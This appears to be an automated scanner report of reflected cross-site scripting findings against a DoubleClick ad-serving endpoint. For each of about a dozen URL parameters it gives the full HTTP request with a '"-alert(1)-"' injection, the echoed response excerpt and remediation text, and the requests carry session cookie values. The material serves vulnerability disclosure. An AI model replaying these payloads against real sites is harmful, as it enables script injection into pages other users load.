GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1e5182"-alert(1)-"9f574a3cb9c&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 3%3B0-0%3B0%3B63339386%3B28248-880/150%3B41893239/41911026/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1e5182"-alert(1)-"9f574a3cb9c&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www ...[SNIP]...
The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce609"-alert(1)-"db184f4d2ae was submitted in the o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253Ace609"-alert(1)-"db184f4d2ae&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... h%3Dv8/3af6/17/135/%2a/u%3B240444493%3B0-0%3B0%3B63339386%3B28248-880/150%3B41893239/41911026/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253Ace609"-alert(1)-"db184f4d2ae&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011 ...[SNIP]...
The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42909"-alert(1)-"8ac8572b64a was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=42909"-alert(1)-"8ac8572b64a&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... Eokv%3D%3Bpc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=42909"-alert(1)-"8ac8572b64a&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177 ...[SNIP]...
The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b99c"-alert(1)-"24ca76604f was submitted in the orh parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=6b99c"-alert(1)-"24ca76604f&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 6/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=6b99c"-alert(1)-"24ca76604f&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/vi ...[SNIP]...
The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f5ce"-alert(1)-"7eba0b485fe was submitted in the p parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=4f5ce"-alert(1)-"7eba0b485fe&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... af6/17/135/%2a/u%3B240444493%3B0-0%3B0%3B63339386%3B28248-880/150%3B41893239/41911026/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=4f5ce"-alert(1)-"7eba0b485fe&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.2 ...[SNIP]...
The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19553"-alert(1)-"12d273e210a was submitted in the pdom parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=19553"-alert(1)-"12d273e210a&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=19553"-alert(1)-"12d273e210a&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumballs%3Bimg%3B2"); ...[SNIP]...
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2b7a"-alert(1)-"a9c10cfd983 was submitted in the pg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAEd2b7a"-alert(1)-"a9c10cfd983&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... =1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAEd2b7a"-alert(1)-"a9c10cfd983&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumballs%3Bimg%3B2"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode ...[SNIP]...
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6d22"-alert(1)-"87db701de97 was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=e6d22"-alert(1)-"87db701de97&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... -0%3B0%3B63339386%3B28248-880/150%3B41893239/41911026/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=e6d22"-alert(1)-"87db701de97&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.game ...[SNIP]...
The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc8d5"-alert(1)-"ea077636822 was submitted in the pp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100cc8d5"-alert(1)-"ea077636822&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 39386%3B28248-880/150%3B41893239/41911026/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100cc8d5"-alert(1)-"ea077636822&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbo ...[SNIP]...
The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32d3b"-alert(1)-"9533bc3329c was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=32d3b"-alert(1)-"9533bc3329c&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 1584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=32d3b"-alert(1)-"9533bc3329c&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumballs%3Bimg% ...[SNIP]...
The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bdf71"-alert(1)-"8c1296a649d was submitted in the pt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000bdf71"-alert(1)-"8c1296a649d&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 444493%3B0-0%3B0%3B63339386%3B28248-880/150%3B41893239/41911026/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000bdf71"-alert(1)-"8c1296a649d&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http: ...[SNIP]...
The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b35f8"-alert(1)-"3d6c7297d10 was submitted in the ra parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243b35f8"-alert(1)-"3d6c7297d10&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
